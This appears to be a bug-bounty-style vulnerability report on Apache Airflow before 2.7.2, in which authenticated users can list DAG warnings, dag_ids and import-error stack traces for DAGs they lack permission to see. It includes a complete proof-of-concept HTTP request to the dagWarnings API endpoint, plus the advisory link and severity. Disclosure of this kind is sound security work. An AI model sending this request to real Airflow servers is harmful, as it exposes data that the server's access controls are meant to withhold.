Apache Airflow, versions prior to 2.7.2, contains a security vulnerability that allows authenticated users of Airflow to list warnings for all DAGs, even if the user had no permission to see those DAGs. It would reveal the dag_ids and the stack-traces of import errors for those DAGs with import errors.
GET /api/v1/dagWarnings HTTP/1.1
Host: testvul.com:8080
Accept: application/json
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
content-type: application/json
Referer: http://testvul.com:8080/dags/example_external_task_marker_parent/grid
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: session=6ba0ebcd-94b6-41e9-8143-2ada52d554b1.IGPZy1m5c8235p5r8qo4GhPl_YM
Connection: close
Content-Length: 0
{F2771429}
Security Advisory: https://lists.apache.org/thread/h5tvsvov8j55wojt5sojdprs05oby34d**Severity**: LowCredit: balis0ng
It allows authenticated users of Airflow to list warnings for all DAGs, even if the user had no permission to see those DAGs. It would reveal the dag_ids and the stack-traces of import errors for those DAGs with import errors.